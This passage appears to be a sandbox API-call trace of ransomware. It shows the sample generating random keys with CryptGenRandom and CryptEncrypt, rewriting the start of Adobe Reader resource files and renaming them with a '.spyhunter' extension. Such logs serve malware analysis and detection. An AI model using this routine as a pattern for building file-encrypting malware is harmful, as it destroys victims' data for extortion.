out: hHeap=0x2c0000) returned 1 [0119.794] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f630 | out: pbBuffer=0x270f630) returned 1 [0119.794] GetProcessHeap () returned 0x2c0000 [0119.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.794] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f628*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f628*=0x30) returned 1 [0119.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-h-cid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.803] GetProcessHeap () returned 0x2c0000 [0119.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.803] GetProcessHeap () returned 0x2c0000 [0119.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44fa8 | out: hHeap=0x2c0000) returned 1 [0119.803] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f630 | out: pbBuffer=0x270f630) returned 1 [0119.803] GetProcessHeap () returned 0x2c0000 [0119.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.803] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f628*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f628*=0x30) returned 1 [0119.803] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.804] GetProcessHeap () returned 0x2c0000 [0119.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.804] GetProcessHeap () returned 0x2c0000 [0119.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e62588 | out: hHeap=0x2c0000) returned 1 [0119.804] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f628 | out: pbBuffer=0x270f628) returned 1 [0119.804] GetProcessHeap () returned 0x2c0000 [0119.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.805] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f620*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f620*=0x30) returned 1 [0119.805] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKm314-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkm314-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.805] GetProcessHeap () returned 0x2c0000 [0119.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.805] GetProcessHeap () returned 0x2c0000 [0119.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e624b0 | out: hHeap=0x2c0000) returned 1 [0119.805] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f628 | out: pbBuffer=0x270f628) returned 1 [0119.805] GetProcessHeap () returned 0x2c0000 [0119.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.805] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f620*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f620*=0x30) returned 1 [0119.805] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.805] GetProcessHeap () returned 0x2c0000 [0119.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.806] GetProcessHeap () returned 0x2c0000 [0119.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e623d8 | out: hHeap=0x2c0000) returned 1 [0119.806] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f620 | out: pbBuffer=0x270f620) returned 1 [0119.806] GetProcessHeap () returned 0x2c0000 [0119.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.806] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f618*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f618*=0x30) returned 1 [0119.806] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKgccs-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkgccs-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.809] GetProcessHeap () returned 0x2c0000 [0119.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.810] GetProcessHeap () returned 0x2c0000 [0119.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e62300 | out: hHeap=0x2c0000) returned 1 [0119.810] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f620 | out: pbBuffer=0x270f620) returned 1 [0119.810] GetProcessHeap () returned 0x2c0000 [0119.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.810] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f618*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f618*=0x30) returned 1 [0119.810] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.810] GetProcessHeap () returned 0x2c0000 [0119.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.810] GetProcessHeap () returned 0x2c0000 [0119.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e62228 | out: hHeap=0x2c0000) returned 1 [0119.810] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f618 | out: pbBuffer=0x270f618) returned 1 [0119.810] GetProcessHeap () returned 0x2c0000 [0119.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.811] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f610*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f610*=0x30) returned 1 [0119.811] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.811] GetProcessHeap () returned 0x2c0000 [0119.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.811] GetProcessHeap () returned 0x2c0000 [0119.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e62150 | out: hHeap=0x2c0000) returned 1 [0119.811] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f618 | out: pbBuffer=0x270f618) returned 1 [0119.811] GetProcessHeap () returned 0x2c0000 [0119.811] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.811] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f610*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f610*=0x30) returned 1 [0119.811] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.811] GetProcessHeap () returned 0x2c0000 [0119.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.811] GetProcessHeap () returned 0x2c0000 [0119.811] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e62078 | out: hHeap=0x2c0000) returned 1 [0119.812] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f610 | out: pbBuffer=0x270f610) returned 1 [0119.812] GetProcessHeap () returned 0x2c0000 [0119.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.812] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f608*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f608*=0x30) returned 1 [0119.812] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdla-B5-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdla-b5-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.813] GetProcessHeap () returned 0x2c0000 [0119.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.813] GetProcessHeap () returned 0x2c0000 [0119.813] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e61fa0 | out: hHeap=0x2c0000) returned 1 [0119.813] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f610 | out: pbBuffer=0x270f610) returned 1 [0119.813] GetProcessHeap () returned 0x2c0000 [0119.813] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.813] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f608*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f608*=0x30) returned 1 [0119.813] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.814] GetProcessHeap () returned 0x2c0000 [0119.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.814] GetProcessHeap () returned 0x2c0000 [0119.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf308 | out: hHeap=0x2c0000) returned 1 [0119.815] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f608 | out: pbBuffer=0x270f608) returned 1 [0119.815] GetProcessHeap () returned 0x2c0000 [0119.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.815] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f600*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f600*=0x30) returned 1 [0119.815] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBT-EUC-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbt-euc-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.831] GetProcessHeap () returned 0x2c0000 [0119.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.831] GetProcessHeap () returned 0x2c0000 [0119.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e61ec8 | out: hHeap=0x2c0000) returned 1 [0119.831] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f608 | out: pbBuffer=0x270f608) returned 1 [0119.831] GetProcessHeap () returned 0x2c0000 [0119.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.831] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f600*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f600*=0x30) returned 1 [0119.832] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\enutxt.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0119.839] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf") returned 64 [0119.839] StrStrW (lpFirst="ENUtxt.pdf", lpSrch=".txt") returned 0x0 [0119.839] GetProcessHeap () returned 0x2c0000 [0119.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0119.839] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f5c4*=0x1d9e, lpOverlapped=0x0) returned 1 [0119.842] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffe262, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.842] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d9e, lpNumberOfBytesWritten=0x270f5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f5c4*=0x1d9e, lpOverlapped=0x0) returned 1 [0119.843] GetProcessHeap () returned 0x2c0000 [0119.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0119.843] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.843] WriteFile (in: hFile=0x154, lpBuffer=0x270f604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f5c4, lpOverlapped=0x0 | out: lpBuffer=0x270f604*, lpNumberOfBytesWritten=0x270f5c4*=0x4, lpOverlapped=0x0) returned 1 [0119.843] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f5c4*=0x30, lpOverlapped=0x0) returned 1 [0119.843] CloseHandle (hObject=0x154) returned 1 [0119.843] GetProcessHeap () returned 0x2c0000 [0119.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0119.845] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf.spyhunter") returned 74 [0119.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\enutxt.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\ENUtxt.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\enutxt.pdf.spyhunter")) returned 1 [0119.846] GetProcessHeap () returned 0x2c0000 [0119.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0119.846] GetProcessHeap () returned 0x2c0000 [0119.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.846] GetProcessHeap () returned 0x2c0000 [0119.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e030c8 | out: hHeap=0x2c0000) returned 1 [0119.848] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f600 | out: pbBuffer=0x270f600) returned 1 [0119.848] GetProcessHeap () returned 0x2c0000 [0119.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.848] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5f8*=0x30) returned 1 [0119.849] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.852] GetProcessHeap () returned 0x2c0000 [0119.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.852] GetProcessHeap () returned 0x2c0000 [0119.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbf308 | out: hHeap=0x2c0000) returned 1 [0119.852] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5f8 | out: pbBuffer=0x270f5f8) returned 1 [0119.852] GetProcessHeap () returned 0x2c0000 [0119.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.853] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5f0*=0x30) returned 1 [0119.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0119.929] GetProcessHeap () returned 0x2c0000 [0119.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.929] GetProcessHeap () returned 0x2c0000 [0119.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e636a0 | out: hHeap=0x2c0000) returned 1 [0119.929] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5f8 | out: pbBuffer=0x270f5f8) returned 1 [0119.929] GetProcessHeap () returned 0x2c0000 [0119.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.929] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5f0*=0x30) returned 1 [0119.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zx______.pfb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0119.932] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB") returned 71 [0119.932] StrStrW (lpFirst="ZX______.PFB", lpSrch=".txt") returned 0x0 [0119.932] GetProcessHeap () returned 0x2c0000 [0119.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0119.933] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f5b4*=0x2800, lpOverlapped=0x0) returned 1 [0119.934] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.934] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f5b4*=0x2800, lpOverlapped=0x0) returned 1 [0119.934] GetProcessHeap () returned 0x2c0000 [0119.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0119.934] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.935] WriteFile (in: hFile=0x154, lpBuffer=0x270f5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f5b4, lpOverlapped=0x0 | out: lpBuffer=0x270f5f4*, lpNumberOfBytesWritten=0x270f5b4*=0x4, lpOverlapped=0x0) returned 1 [0119.941] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f5b4*=0x30, lpOverlapped=0x0) returned 1 [0119.941] CloseHandle (hObject=0x154) returned 1 [0119.941] GetProcessHeap () returned 0x2c0000 [0119.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2eb7be8 [0119.942] wnsprintfW (in: pszDest=0x2eb7be8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB.spyhunter") returned 81 [0119.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zx______.pfb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zx______.pfb.spyhunter")) returned 1 [0119.942] GetProcessHeap () returned 0x2c0000 [0119.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x2c0000) returned 1 [0119.943] GetProcessHeap () returned 0x2c0000 [0119.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0119.943] GetProcessHeap () returned 0x2c0000 [0119.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b028 | out: hHeap=0x2c0000) returned 1 [0119.943] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f5f0 | out: pbBuffer=0x270f5f0) returned 1 [0119.943] GetProcessHeap () returned 0x2c0000 [0119.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0119.943] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f5e8*=0x30) returned 1 [0119.943] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\sy______.pfb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0119.944] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB") returned 71 [0119.944] StrStrW (lpFirst="SY______.PFB", lpSrch=".txt") returned 0x0 [0119.944] GetProcessHeap () returned 0x2c0000 [0119.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0119.944] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f5ac*=0x2800, lpOverlapped=0x0) returned 1 [0119.956] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0119.956] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f5ac*=0x2800, lpOverlapped=0x0) returned 1 [0119.956] GetProcessHeap () returned 0x2c0000 [0119.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0119.956] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0119.957] WriteFile 